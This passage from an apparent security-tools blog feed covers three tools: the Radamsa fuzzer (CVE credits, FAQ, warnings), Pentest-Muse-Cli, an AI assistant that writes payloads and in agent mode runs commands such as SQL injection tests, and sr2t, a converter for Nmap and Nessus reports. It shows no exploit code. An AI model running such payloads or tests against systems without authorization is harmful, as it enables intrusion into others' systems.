<td>Chrome</td> <td>OUSPG via NodeFuzz</td> </tr> <tr> <td>CVE-2012-5121</td> <td>Chrome</td> <td>OUSPG via NodeFuzz</td> </tr> <tr> <td>CVE-2012-5145</td> <td>Chrome</td> <td>OUSPG via NodeFuzz</td> </tr> <tr> <td>CVE-2012-4186</td> <td>Mozilla Firefox</td> <td>OUSPG via NodeFuzz</td> </tr> <tr> <td>CVE-2012-4187</td> <td>Mozilla Firefox</td> <td>OUSPG via NodeFuzz</td> </tr> <tr> <td>CVE-2012-4188</td> <td>Mozilla Firefox</td> <td>OUSPG via NodeFuzz</td> </tr> <tr> <td>CVE-2012-4202</td> <td>Mozilla Firefox</td> <td>OUSPG via NodeFuzz</td> </tr> <tr> <td>CVE-2013-0744</td> <td>Mozilla Firefox</td> <td>OUSPG via NodeFuzz</td> </tr> <tr> <td>CVE-2013-1691</td> <td>Mozilla Firefox</td> <td>OUSPG</td> </tr> <tr> <td>CVE-2013-1708</td> <td>Mozilla Firefox</td> <td>OUSPG</td> </tr> <tr> <td>CVE-2013-4082</td> <td>Wireshark</td> <td>found by cons0ul</td> </tr> <tr> <td>CVE-2013-1732</td> <td>Mozilla Firefox</td> <td>OUSPG</td> </tr> <tr> <td>CVE-2014-0526</td> <td>Adobe Reader X/XI</td> <td>Pedro Ribeiro (pedrib@gmail.com)</td> </tr> <tr> <td>CVE-2014-3669</td> <td>PHP</td> <td></td> </tr> <tr> <td>CVE-2014-3668</td> <td>PHP</td> <td></td> </tr> <tr> <td>CVE-2014-8449</td> <td>Adobe Reader X/XI</td> <td>Pedro Ribeiro (pedrib@gmail.com)</td> </tr> <tr> <td>CVE-2014-3707</td> <td>cURL</td> <td>Symeon Paraschoudis</td> </tr> <tr> <td>CVE-2014-7933</td> <td>Chrome</td> <td>OUSPG</td> </tr> <tr> <td>CVE-2015-0797</td> <td>Mozilla Firefox</td> <td>OUSPG</td> </tr> <tr> <td>CVE-2015-0813</td> <td>Mozilla Firefox</td> <td>OUSPG</td> </tr> <tr> <td>CVE-2015-1220</td> <td>Chrome</td> <td>OUSPG</td> </tr> <tr> <td>CVE-2015-1224</td> <td>Chrome</td> <td>OUSPG</td> </tr> <tr> <td>CVE-2015-2819</td> <td>Sybase SQL</td> <td>vah_13 (ERPScan)</td> </tr> <tr> <td>CVE-2015-2820</td> <td>SAP Afaria</td> <td>vah_13 (ERPScan)</td> </tr> <tr> <td>CVE-2015-7091</td> <td>Apple QuickTime</td> <td>Pedro Ribeiro (pedrib@gmail.com)</td> </tr> <tr> <td>CVE-2015-8330</td> <td>SAP PCo agent</td> <td>Mathieu GELI (ERPScan)</td> </tr> <tr> <td>CVE-2016-1928</td> <td>SAP HANA hdbxsengine</td> <td>Mathieu Geli (ERPScan)</td> </tr> <tr> <td>CVE-2016-3979</td> <td>SAP NetWeaver</td> <td>@ret5et (ERPScan)</td> </tr> <tr> <td>CVE-2016-3980</td> <td>SAP NetWeaver</td> <td>@ret5et (ERPScan)</td> </tr> <tr> <td>CVE-2016-4015</td> <td>SAP NetWeaver</td> <td>@vah_13 (ERPScan)</td> </tr> <tr> <td>CVE-2016-4015</td> <td>SAP NetWeaver</td> <td>@vah_13 (ERPScan)</td> </tr> <tr> <td>CVE-2016-9562</td> <td>SAP NetWeaver</td> <td>@vah_13 (ERPScan)</td> </tr> <tr> <td>CVE-2017-5371</td> <td>SAP ASE OData</td> <td>@vah_13 (ERPScan)</td> </tr> <tr> <td>CVE-2017-9843</td> <td>SAP NETWEAVER</td> <td>@vah_13 (ERPScan)</td> </tr> <tr> <td>CVE-2017-9845</td> <td>SAP NETWEAVER</td> <td>@vah_13 (ERPScan)</td> </tr> <tr> <td><a href="https://www.nccgroup.trust/globalassets/newsroom/uk/events/offensivecon2018-the-return-of-robin-hood-vs-cisco-asa.pdf" rel="nofollow" target="_blank" title="CVE-2018-0101">CVE-2018-0101</a></td> <td>Cisco ASA WebVPN/AnyConnect</td> <td>@saidelike (NCC Group)</td> </tr> </tbody> </table> <p>We would like to thank the Chromium project and Mozilla for analyzing, fixing and reporting further many of the above mentioned issues, CERT-FI for feedback and disclosure handling, and other users, projects and vendors who have responsibly taken care of uncovered bugs.</p> <h2>Thanks</h2> <p>The following people have contributed to the development of radamsa in code, ideas, issues or otherwise.</p> <ul> <li>Darkkey</li> <li>Branden Archer</li> </ul> <h2>Troubleshooting</h2> <p>Issues in Radamsa can be reported to the issue tracker. The tool is under development, but we are glad to get error reports even for known issues to make sure they are not forgotten.</p> <p>You can also drop by at #radamsa on Freenode if you have questions or feedback.</p> <p>Issues your programs should be fixed. If Radamsa finds them quickly (say, in an hour or a day) chances are that others will too.</p> <p>Issues in other programs written by others should be dealt with responsibly. Even fairly simple errors can turn out to be exploitable, especially in programs written in low-level languages. In case you find something potentially severe, like an easily reproducible crash, and are unsure what to do with it, ask the vendor or project members, or your local CERT.</p> <h1>FAQ</h1> <p>Q: If I find a bug with radamsa, do I have to mention the tool?<br /> A: No.</p> <p>Q: Will you make a graphical version of radamsa?<br /></p><p>A: No. The intention is to keep it simple and scriptable for use in <a href="https://www.kitploit.com/search/label/Automated" target="_blank" title="automated">automated</a> regression tests and continuous testing.</p> <p>Q: I can't install! I don't have root access on the machine!<br /> A: You can omit the $ make install part and just run radamsa from bin/radamsa in the build directory, or copy it somewhere else and use from there.</p> <p>Q: Radamsa takes several GB of memory to compile!1<br /> A: This is most likely due to an issue with your C compiler. Use prebuilt images or try the quick build instructions in this page.</p> <p>Q: Radamsa does not compile using the instructions in this page!<br /> A: Please file an issue at https://gitlab.com/akihe/radamsa/issues/new if you don't see a similar one already filed, send email (aohelin@gmail.com) or IRC (#radamsa on freenode).</p> <p>Q: I used fuzzer X and found much more bugs from program Y than Radamsa did.<br /> A: Cool. Let me know about it (aohelin@gmail.com) and I'll try to hack something X-ish to radamsa if it's general purpose enough. It'd also be useful to get some samples which you used to check how well radamsa does, because it might be overfitting some heuristic.</p> <p>Q: Can I get support for using radamsa?<br /> A: You can send email to aohelin@gmail.com or check if some of us happen to be hanging around at #radamsa on freenode.</p> <p>Q: Can I use radamsa on Windows?<br /> A: An experimental Windows executable is now in Downloads, but we have usually not tested it properly since we rarely use Windows internally. Feel free to file an issue if something is broken.</p> <p>Q: How can I install radamsa?<br /> A: Grab a binary from downloads and run it, or $ make && sudo make install.</p> <p>Q: How can I uninstall radamsa?<br /> A: Remove the binary you grabbed from downloads, or $ sudo make uninstall.</p> <p>Q: Why are many outputs generated by Radamsa equal?<br /> A: Radamsa doesn't keep track which outputs it has already generated, but instead relies on varying mutations to keep the output varying enough. Outputs can often be the same if you give a few small samples and generate lots of outputs from them. If you do spot a case where lots of equal outputs are generated, we'd be interested in hearing about it.</p> <p>Q: There are lots of command line options. Which should I use for best results?<br /> A: The recommended use is $ radamsa -o output-%n.foo -n 100 samples/*.foo, which is also what is used internally at OUSPG. It's usually best and most future proof to let radamsa decide the details.</p> <p>Q: How can I make radamsa faster?<br /> A: Radamsa typically writes a few megabytes of output per second. If you enable only simple mutations, e.g. -m bf,bd,bi,br,bp,bei,bed,ber,sr,sd, you will get about 10x faster output.</p> <p>Q: What's with the funny name?<br /> A: It's from a scene in a Finnish children's story. You've probably never heard about it.</p> <p>Q: Is this the last question?<br /> A: Yes.</p> <h2>Warnings</h2> <p></p><p>Use of data generated by radamsa, especially when targeting buggy programs running with high privileges, can result in arbitrarily bad things to happen. A typical unexpected issue is caused by a file manager, automatic indexer or <a href="https://www.kitploit.com/search/label/Antivirus" target="_blank" title="antivirus">antivirus</a> scanner trying to do something to fuzzed data before they are being tested intentionally. We have seen spontaneous reboots, system hangs, file system corruption, loss of data, and other nastiness. When in doubt, use a disposable system, throwaway profile, chroot jail, sandbox, separate user account, or an emulator.</p> <p>Not safe when used as prescribed.</p> <p>This product may contain faint traces of parenthesis.</p><br /><br /><div style="text-align: center;"><b><span style="font-size: x-large;"><a class="kiploit-download" href="https://gitlab.com/akihe/radamsa" rel="nofollow" target="_blank" title="Download Radamsa">Download Radamsa</a></span></b></div>Unknownnoreply@blogger.comtag:blogger.com,1999:blog-8317222231133660547.post-45351565402794306272024-03-24T08:30:00.001-03:002024-03-24T08:30:00.180-03:00Pentest-Muse-Cli - AI Assistant Tailored For Cybersecurity Professionals<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgp36JaXhc6meMUOFoN5ZY_1zibRIuxSjW0QIMWgVBVzHkfquKJ7AQY5aopGUYqZj1YcBpKT75LB3OyNm50BhNz-MSCc9K6CQbMtJWfWzT11rYLlk2ZZPVuy2CMHh4ggFv6bqGE5C8MJ3DSdWCEV3e7OBN_vx_tRiB8ppekFagCQozPBfVetZxFoLxO6rYA/s1242/Pentest%20Muse.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="426" data-original-width="1242" height="220" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgp36JaXhc6meMUOFoN5ZY_1zibRIuxSjW0QIMWgVBVzHkfquKJ7AQY5aopGUYqZj1YcBpKT75LB3OyNm50BhNz-MSCc9K6CQbMtJWfWzT11rYLlk2ZZPVuy2CMHh4ggFv6bqGE5C8MJ3DSdWCEV3e7OBN_vx_tRiB8ppekFagCQozPBfVetZxFoLxO6rYA/w640-h220/Pentest%20Muse.png" width="640" /></a></div><p><br /></p> <p>Pentest Muse is an AI assistant tailored for <a href="https://www.kitploit.com/search/label/Cybersecurity" target="_blank" title="cybersecurity">cybersecurity</a> professionals. It can help penetration testers brainstorm ideas, write payloads, analyze code, and perform reconnaissance. It can also take actions, execute <a href="https://www.kitploit.com/search/label/Command%20Line" target="_blank" title="command line">command line</a> codes, and iteratively solve complex tasks. </p><span><a name='more'></a></span><p><br /></p> <h2>Pentest Muse Web App</h2> <p>In addition to this command-line tool, we are excited to introduce the <a href="https://www.pentestmuse.ai" rel="nofollow" target="_blank" title="Pentest Muse Web Application">Pentest Muse Web Application</a>! The web app has access to the latest online information, and would be a good AI assistant for your <a href="https://www.kitploit.com/search/label/Pentesting" target="_blank" title="pentesting">pentesting</a> job.</p> <h2>Disclaimer</h2> <p>This tool is intended for legal and ethical use only. It should only be used for authorized security testing and educational purposes. The developers assume no liability and are not responsible for any misuse or damage caused by this program.</p> <h2>Requirements</h2> <ul> <li>Python 3.12 or later</li> <li>Necessary Python packages as listed in <code>requirements.txt</code></li> </ul> <h2>Setup</h2> <h3>Standard Setup</h3> <ol> <li>Clone the repository:</li> </ol> <p><code>git clone https://github.com/pentestmuse-ai/PentestMuse cd PentestMuse</code></p> <ol> <li>Install the required packages:</li> </ol> <p><code>pip install -r requirements.txt</code></p> <h3>Alternative Setup (Package Installation)</h3> <p>Install Pentest Muse as a Python Package:</p> <p><code>pip install .</code></p> <h2>Running the Application</h2> <h3>Chat Mode (Default)</h3> <p>In the chat mode, you can chat with pentest muse and ask it to help you brainstorm ideas, write payloads, and analyze code. Run the application with:</p> <pre><code>python run_app.py<br /></code></pre> <p>or</p> <pre><code>pmuse<br /></code></pre> <h3>Agent Mode (Experimental)</h3> <p>You can also give Pentest Muse more control by asking it to take actions for you with the agent mode. In this mode, Pentest Muse can help you finish a simple task (e.g., 'help me do sql <a href="https://www.kitploit.com/search/label/Injection" target="_blank" title="injection">injection</a> test on url xxx'). To start the program with agent model, you can use:</p> <pre><code>python run_app.py agent<br /></code></pre> <p>or</p> <pre><code>pmuse agent<br /></code></pre> <h2>Selection of Language Models</h2> <h3>Managed APIs</h3> <p>You can use Pentest Muse with our managed APIs after signing up at www.pentestmuse.ai/signup. After creating an account, you can simply start the pentest muse cli, and the program will prompt you to login.</p> <h3>OpenAI API keys</h3> <p>Alternatively, you can also choose to use your own OpenAI API keys. To do this, you can simply add argument <code>--openai-api-key=[your <a href="https://www.kitploit.com/search/label/Openai%20Api" target="_blank" title="openai api">openai api</a> key]</code> when starting the program. </p> <h2>Contact</h2> <p>For any feedback or suggestions regarding Pentest Muse, feel free to reach out to us at contact@pentestmuse.ai or <a href="https://discord.gg/5cY35u99Nr" rel="nofollow" target="_blank" title="join our discord">join our discord</a>. Your input is invaluable in helping us improve and evolve.</p><br /><br /><div style="text-align: center;"><b><span style="font-size: x-large;"><a class="kiploit-download" href="https://github.com/AbstractEngine/pentest-muse-cli" rel="nofollow" target="_blank" title="Download Pentest-Muse-Cli">Download Pentest-Muse-Cli</a></span></b></div>Unknownnoreply@blogger.comtag:blogger.com,1999:blog-8317222231133660547.post-83151827508504730822024-03-23T08:30:00.017-03:002024-03-23T08:30:00.138-03:00Sr2T - Converts Scanning Reports To A Tabular Format<p style="text-align: center;"><br /></p><p style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEi1spzZBtG6IRKni8cd32cywUaCQtCQIt8fhS67WK_idpnWxKVYdztUtJZSGZyJDGX0rRmrClNZhOdHsLvUX46yh8Z7lzyZwnzBC-YLLQgYQLQLpktdXrkgBhc35kyxlzLpc97MgSrXhVwjzinWJscY3wGaM9L5K2gt1Qh8MyILnqHIQP_jXv-9agpZa8Y"><img alt="" border="0" height="334" id="BLOGGER_PHOTO_ID_7348941231914934178" src="https://blogger.googleusercontent.com/img/a/AVvXsEi1spzZBtG6IRKni8cd32cywUaCQtCQIt8fhS67WK_idpnWxKVYdztUtJZSGZyJDGX0rRmrClNZhOdHsLvUX46yh8Z7lzyZwnzBC-YLLQgYQLQLpktdXrkgBhc35kyxlzLpc97MgSrXhVwjzinWJscY3wGaM9L5K2gt1Qh8MyILnqHIQP_jXv-9agpZa8Y=w640-h334" width="640" /></a></p> <h1>Scanning reports to tabular (sr2t)</h1> <p></p><p>This tool takes a <a href="https://www.kitploit.com/search/label/Scanning" target="_blank" title="scanning">scanning</a> tool's output file, and converts it to a tabular format (CSV, XLSX, or text table). This tool can process output from the following tools:</p> <ol> <li>Nmap (XML);</li> <li>Nessus (XML);</li> <li>Nikto (XML);</li> <li>Dirble (XML);</li> <li>Testssl (JSON);</li> <li>Fortify (FPR).</li> </ol><span><a name='more'></a></span><div><br /></div> <h2>Rationale</h2> <p></p><p>This tool can offer a human-readable, tabular format which you can tie to any observations you have drafted in your report. Why? Because then your reviewers can tell that you, the pentester, investigated all found open ports, and looked at all <a href="https://www.kitploit.com/search/label/Scanning" target="_blank" title="scanning">scanning</a> reports.</p> <h2>Dependencies</h2> <ol> <li>argparse (dev-python/argparse);</li> <li>prettytable (dev-python/prettytable);</li> <li>python (dev-lang/python);</li> <li>xlsxwriter (dev-python/xlsxwriter).</li> </ol> <h2>Install</h2> <p>Using Pip:</p> <p><code>pip install --user sr2t</code></p> <h2>Usage</h2> <p>You can use <code>sr2t</code> in two ways:</p> <ul> <li>When installed as package, call the installed script: <code>sr2t --help</code>.</li> <li>When Git cloned, call the package directly from the root of the Git repository: <code>python -m src.sr2t --help</code></li> </ul> <pre><code>$ sr2t --help<br />usage: sr2t [-h] [--nessus NESSUS [NESSUS ...]] [--nmap NMAP [NMAP ...]]<br /> [--nikto NIKTO [NIKTO ...]] [--dirble DIRBLE [DIRBLE ...]]<br /> [--testssl TESTSSL [TESTSSL ...]]<br /> [--fortify FORTIFY [FORTIFY ...]] [--nmap-state NMAP_STATE]<br /> [--nmap-services] [--no-nessus-autoclassify]<br /> [--nessus-autoclassify-file NESSUS_AUTOCLASSIFY_FILE]<br /> [--nessus-tls-file NESSUS_TLS_FILE]<br /> [--nessus-x509-file NESSUS_X509_FILE]<br /> [--nessus-http-file NESSUS_HTTP_FILE]<br /> [--nessus-smb-file NESSUS_SMB_FILE]<br /> [--nessus-rdp-file NESSUS_RDP_FILE]<br /> [--nessus-ssh-file NESSUS_SSH_FILE]<br /> [--nessus-min-severity NESSUS_MIN_SEVERITY]<br /> [--nessus-plugin-name-width NESSUS_PLUGIN_NAME_WIDTH]<br /> [--nessus-sort-by NESSUS_SORT_BY]<br /> [--nikto-description-width NIKTO_DESCRIPTION_WIDTH]< br/> [--fortify-details] [--annotation-width ANNOTATION_WIDTH]<br /> [-oC OUTPUT_CSV] [-oT OUTPUT_TXT] [-oX OUTPUT_XLSX]<br /> [-oA OUTPUT_ALL]<br /><br />Converting scanning reports to a tabular format<br /><br />optional arguments:<br /> -h, --help show this help message and exit<br /> --nmap-state NMAP_STATE<br /> Specify the desired state to filter (e.g.<br /> open|filtered).<br /> --nmap-services Specify to ouput a supplemental list of detected<br /> services.<br /> --no-nessus-autoclassify<br /> Specify to not autoclassify Nessus results.<br /> --nessus-autoclassify-file NESSUS_AUTOCLASSIFY_FILE<br /> Specify to override a custom Nessus autoclassify YAML<br /> file.<br /> --nessus-tls-file NESSUS_TLS_FILE<br /> Specify to override a custom Nessus TLS findings YAML<br /> file.<br /> --nessus-x509-file NESSUS_X509_FILE<br /> Specify to override a custom Nessus X.509 findings<br /> YAML file.<br /> --nessus-http-file NESSUS_HTTP_FILE<br /> Specify to override a custom Nessus HTTP findings YAML<br /> file.<br /> --nessus-smb-file NESSUS_SMB_FILE<br /> Specify to override a custom Nessus SMB findings YAML<br /> file.<br /> --nessus-rdp-file NESSUS_RDP_FILE<br /> Specify to override a custom Nessus RDP findings YAML<br /> file.<br /> --nessus-ssh-file NESSUS_SSH_FILE<br /> Specify to override a custom Nessus SSH findings YAML<br /> file.<br /> --nessus-min-severity NESSUS_MIN_SEVERITY<br /> Specify the minimum severity to output (e.g. 1).<br /> --nessus-plugin-name-width NESSUS_PLUGIN_NAME_WIDTH<br /> Specify the width of the pluginid column (e.g. 30).<br /> --nessus-sort-by NESSUS_SORT_BY<br /> Specify to sort output by ip-address, port, plugin-id,<br /> plugin-name or severity.<br /> --nikto-description-width NIKTO_DESCRIPTION_WIDTH<br /> Specify the width of the description column (e.g. 30).<br /> --fortify-details Specify to include the Fortify abstracts, explanations<br /> and recommendations for each vulnerability.<br /> --annotation-width ANNOTATION_WIDTH<br /> Specify the width of the annotation column (e.g. 30).<br /> -oC OUTPUT_CSV, --output-csv OUTPUT_CSV<br /> Specify the output CSV basename (e.g. output).<br /> -oT OUTPUT_TXT, --output-txt OUTPUT_TXT<br /> Specify the output TXT file (e.g. output.txt).<br /> -oX OUTPUT_XLSX, --output-xlsx OUTPUT_XLSX<br /> Specify the outpu t XLSX file (e.g. output.xlsx). Only<br /> for Nessus at the moment<br /> -oA OUTPUT_ALL, --output-all OUTPUT_ALL<br /> Specify the output basename to output to all formats<br /> (e.g. output).<br /><br />specify at least one:<br /> --nessus NESSUS [NESSUS ...]<br /> Specify (multiple) Nessus XML files.<br /> --nmap NMAP [NMAP ...]<br /> Specify (multiple) Nmap XML files.<br /> --nikto NIKTO [NIKTO ...]<br /> Specify (multiple) Nikto XML files.<br /> --dirble DIRBLE [DIRBLE ...]<br /> Specify (multiple) Dirble XML files.<br /> --testssl TESTSSL [TESTSSL ...]<br /> Specify (multiple) Testssl JSON files.<br /> --fortify FORTIFY [FORTIFY ...]<br /> Specify (multiple) HP Fortify FPR files.<br /></code></pre> <h2>Example</h2> <p>A few examples</p> <h3>Nessus</h3> <p>To produce an XLSX format:</p> <pre><code>$ sr2t --nessus example/nessus.nessus --no-nessus-autoclassify -oX example.xlsx<br /></code></pre> <p style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEhrlelPl4pgyuW1SE8vlIz1jBSPwmZ-vEZZaV5jq0TujHxbUnFFKHrv5Muojly0Z2uM-L1YQbFPqETqQ2lraiY3aKUwtX7x9SXynnVDvNwxcIK6Y1oRKAm3qRfZLLXtu3Glw6B0h_xcvOlMNLLxQU5uEjknxSGauSG8XPJ-3Q2g0sjnoQzqp9oC1AXZljA"><img alt="" border="0" height="334" id="BLOGGER_PHOTO_ID_7348941225013694178" src="https://blogger.googleusercontent.com/img/a/AVvXsEhrlelPl4pgyuW1SE8vlIz1jBSPwmZ-vEZZaV5jq0TujHxbUnFFKHrv5Muojly0Z2uM-L1YQbFPqETqQ2lraiY3aKUwtX7x9SXynnVDvNwxcIK6Y1oRKAm3qRfZLLXtu3Glw6B0h_xcvOlMNLLxQU5uEjknxSGauSG8XPJ-3Q2g0sjnoQzqp9oC1AXZljA=w640-h334" width="640" /></a></p> <p style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEjm4-KU4OE2Y9RYOmtuglNsjfSaDbfJSyZX2LayFFEX_TqyIvmmMdAyzZnfFfIux1n7UpH8-V-Cwk15pIf4B5gsqBCXCpFJqh6kTMLG4YEKklodmaJ2GQv_99hIz6pFw5kpi34g0YC6nYMrmwZfoO3t2xL8dSiPeCBhS0VpfuKjOpB_0B6kYt_BPB1Ef-s"><img alt="" border="0" height="334" id="BLOGGER_PHOTO_ID_7348941230643252066" src="https://blogger.googleusercontent.com/img/a/AVvXsEjm4-KU4OE2Y9RYOmtuglNsjfSaDbfJSyZX2LayFFEX_TqyIvmmMdAyzZnfFfIux1n7UpH8-V-Cwk15pIf4B5gsqBCXCpFJqh6kTMLG4YEKklodmaJ2GQv_99hIz6pFw5kpi34g0YC6nYMrmwZfoO3t2xL8dSiPeCBhS0VpfuKjOpB_0B6kYt_BPB1Ef-s=w640-h334" width="640" /></a></p> <p style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEi1spzZBtG6IRKni8cd32cywUaCQtCQIt8fhS67WK_idpnWxKVYdztUtJZSGZyJDGX0rRmrClNZhOdHsLvUX46yh8Z7lzyZwnzBC-YLLQgYQLQLpktdXrkgBhc35kyxlzLpc97MgSrXhVwjzinWJscY3wGaM9L5K2gt1Qh8MyILnqHIQP_jXv-9agpZa8Y"><img alt="" border="0" height="334" id="BLOGGER_PHOTO_ID_7348941231914934178" src="https://blogger.googleusercontent.com/img/a/AVvXsEi1spzZBtG6IRKni8cd32cywUaCQtCQIt8fhS67WK_idpnWxKVYdztUtJZSGZyJDGX0rRmrClNZhOdHsLvUX46yh8Z7lzyZwnzBC-YLLQgYQLQLpktdXrkgBhc35kyxlzLpc97MgSrXhVwjzinWJscY3wGaM9L5K2gt1Qh8MyILnqHIQP_jXv-9agpZa8Y=w640-h334" width="640" /></a></p> <p style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEh3x1ZM6oSyklHC9rMSINEtsPDBFiU2Jjx_2JAl9lwh1MjpH_J2UalYEUGMEwokgdzV1z-I5nd3sArPejR9l-DBHc7Eo1riT6jrfeOvIs_L_54LFQOahjvcxANUJVV3Q6ddzJBUo5BEF8TklioWQoxjzG4yES1rJGF69_adze94BuCKwhmzV-F2wsBdxtw"><img alt="" border="0" height="334" id="BLOGGER_PHOTO_ID_7348941232623535618" src="https://blogger.googleusercontent.com/img/a/AVvXsEh3x1ZM6oSyklHC9rMSINEtsPDBFiU2Jjx_2JAl9lwh1MjpH_J2UalYEUGMEwokgdzV1z-I5nd3sArPejR9l-DBHc7Eo1riT6jrfeOvIs_L_54LFQOahjvcxANUJVV3Q6ddzJBUo5BEF8TklioWQoxjzG4yES1rJGF69_adze94BuCKwhmzV-F2wsBdxtw=w640-h334" width="640" /></a></p> <p>To produce an text tabular format to stdout:</p> <pre><code>$ sr2t --nessus example/nessus.nessus<br />+---------------+-------+-----------+-----------------------------------------------------------------------------+----------+-------------+<br />| host | port | plugin id | plugin name | severity | annotations |<br />+---------------+-------+-----------+-----------------------------------------------------------------------------+----------+-------------+<br />| 192.168.142.4 | 3389 | 42873 | SSL Medium Strength Cipher Suites Supported (SWEET32) | 2 | X |<br />| 192.168.142.4 | 443 | 42873 | SSL Medium Strength Cipher Suites Supported (SWEET32) | 2 | X |<br />| 192.168.142.4 | 3389 | 18405 | Microsoft Windows Remote Desktop Protocol Server Man-in-the-Middle Weakness | 2 | X |<br />| 192.168.142.4 | 3389 | 30218 | Terminal Services Encryption Level is not FIPS-140 Compliant | 1 | X |<br />| 192.168.142.4 | 3389 | 57690 | Terminal Services Encryption Level is Medium or Low | 2 | X |<br />| 192.168.142.4 | 3389 | 58453 | Terminal Services Doesn't Use Network Level Authentication (NLA) Only | 2 | X |<br />| 192.168.142.4 | 3389 | 45411 | SSL Certificate with Wrong Hostname | 2 | X |<br />| 192.168.142.4 | 443 | 45411 | SSL Certificate with Wrong Hostname | 2 | X |<br />| 192.168.142.4 | 3389 | 35291 | SSL Certificate Signed Using Weak Hashing Algorithm | 2 | X |<br />| 192.168.142.4 | 3389 | 57582 | SSL Self-Signed Certificate | 2 | X |<br />| 192.168.142.4 | 3389 | 51192 | SSL Certificate Can not Be Trusted | 2 | X |<br />| 192.168.142.2 | 3389 | 42873 | SSL Medium Strength Cipher Suites Supported (SWEET32) | 2 | X |<br />| 192.168.142.2 | 443 | 42873 | SSL Medium Strength Cipher Suites Supported (SWEET32) | 2 | X |<br />| 192.168.142.2 | 3389 | 18405 | Microsoft Windows Remote Desktop Protocol Server Man-in-the-Middle Weakness | 2 | X |<br />| 192.168.142.2 | 3389 | 30218 | Terminal Services Encryption Level is not FIPS-140 Compliant | 1 | X |<br />| 192.168.142.2 | 3389 | 57690 | Terminal Services Encryption Level is Medium or Low | 2 | X |<br />| 192.168.142.2 | 3389 | 58453 | Terminal Services Doesn't Use Network Level Authentication (NLA) Only | 2 | X |<br />| 192.168.142.2 | 3389 | 45411 | S SL Certificate with Wrong Hostname | 2 | X |<br />| 192.168.142.2 | 443 | 45411 | SSL Certificate with Wrong Hostname | 2 | X |<br />| 192.168.142.2 | 3389 | 35291 | SSL Certificate Signed Using Weak Hashing Algorithm | 2 | X |<br />| 192.168.142.2 | 3389 | 57582 | SSL Self-Signed Certificate | 2 | X |<br />| 192.168.142.2 | 3389 | 51192 | SSL Certificate Cannot Be Trusted | 2 | X |<br />| 192.168.142.2 | 445 | 57608 | SMB Signing not required | 2 | X |<br />+---------------+-------+-----------+-----------------------------------------------------------------------------+----------+-------------+<br /></code></pre> <p>Or to output a CSV file:</p> <pre><code>$ sr2t --nessus example/nessus.nessus -oC example<br />$ cat example_nessus.csv<br />host,port,plugin id,plugin name,severity,annotations<br />192.168.142.4,3389,42873,SSL Medium Strength Cipher Suites Supported (SWEET32),2,X<br />192.168.142.4,443,42873,SSL Medium Strength Cipher Suites Supported (SWEET32),2,X<br />192.168.142.4,3389,18405,Microsoft Windows Remote Desktop Protocol Server Man-in-the-Middle Weakness,2,X<br />192.168.142.4,3389,30218,Terminal Services Encryption Level is not FIPS-140 Compliant,1,X<br />192.168.142.4,3389,57690,Terminal Services Encryption Level is Medium or Low,2,X<br />192.168.142.4,3389,58453,Terminal Services Doesn't Use Network Level Authentication (NLA) Only,2,X<br />192.168.142.4,3389,45411,SSL Certificate with Wrong Hostname,2,X<br />192.168.142.4,443,45411,SSL Certificate with Wrong Hostname,2,X<br />192.168.142.4,3389,35291,SSL Certificate Signed Using Weak Hashing Algorithm,2,X<br />192.168.142.4,3389,57582,SSL Self-Signed Certificate,2,X<br /> 192.168.142.4,3389,51192,SSL Certificate Cannot Be Trusted,2,X<br />192.168.142.2,3389,42873,SSL Medium Strength Cipher Suites Supported (SWEET32),2,X<br />192.168.142.2,443,42873,SSL Medium Strength Cipher Suites Supported (SWEET32),2,X<br />192.168.142.2,3389,18405,Microsoft Windows Remote Desktop Protocol Server Man-in-the-Middle Weakness,2,X<br />192.168.142.2,3389,30218,Terminal Services Encryption Level is not FIPS-140 Compliant,1,X<br />192.168.142.2,3389,57690,Terminal Services Encryption Level is Medium or Low,2,X<br />192.168.142.2,3389,58453,Terminal Services Doesn't Use Network Level Authentication (NLA) Only,2,X<br />192.168.142.2,3389,45411,SSL Certificate with Wrong Hostname,2,X<br />192.168.142.2,443,45411,SSL Certificate with Wrong Hostname,2,X<br />192.168.142.2,3389,35291,SSL Certificate Signed Using Weak Hashing Algorithm,2,X<br />192.168.142.2,3389,57582,SSL Self-Signed Certificate,2,X<br />192.168.142.2,3389,51192,SSL Certificate Cannot Be Trusted,2,X<br />192.168.142.2,44 5,57608,SMB Signing not required,2,X<br /></code></pre> <h3>Nmap</h3> <p>To produce an XLSX format:</p> <pre><code>$ sr2t --nmap example/nmap.xml -oX example.xlsx<br /></code></pre> <p style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEgMlODPqOGd_I1zcRBiUjQSSMA-bbgbtY316lsLGMTuvH5AHtMotfJ54_fttCErE1ipA1ZsZgJTLhPXNaqZ0E0lup2Ybb-gduzjzecwam_f0B_j4Nt2Ay3P63tR91UPveTr_ejbshhr-AupDksFVyf73ji2SKa3krOjclGmoSsgNmUTYpJIA6-UonKhKx4"><img alt="" border="0" height="504" id="BLOGGER_PHOTO_ID_7348941240971270610" src="https://blogger.googleusercontent.com/img/a/AVvXsEgMlODPqOGd_I1zcRBiUjQSSMA-bbgbtY316lsLGMTuvH5AHtMotfJ54_fttCErE1ipA1ZsZgJTLhPXNaqZ0E0lup2Ybb-gduzjzecwam_f0B_j4Nt2Ay3P63tR91UPveTr_ejbshhr-AupDksFVyf73ji2SKa3krOjclGmoSsgNmUTYpJIA6-UonKhKx4=w640-h504" width="640" /></a></p> <p>To produce an text tabular format to stdout:</p> <pre><code>$ sr2t --nmap example/nmap.xml --nmap-services<br />Nmap TCP:<br />+-----------------+----+----+----+-----+-----+-----+-----+------+------+------+<br />| | 53 | 80 | 88 | 135 | 139 | 389 | 445 | 3389 | 5800 | 5900 |<br />+-----------------+----+----+----+-----+-----+-----+-----+------+------+------+<br />| 192.168.23.78 | X | | X | X | X | X | X | X | | |<br />| 192.168.27.243 | | | | X | X | | X | X | X | X |<br />| 192.168.99.164 | | | | X | X | | X | X | X | X |<br />| 192.168.228.211 | | X | | | | | | | | |<br />| 192.168.171.74 | | | | X | X | | X | X | X | X |<br />+-----------------+----+----+----+-----+-----+-----+-----+------+------+------+<br /><br />Nmap Services:<br 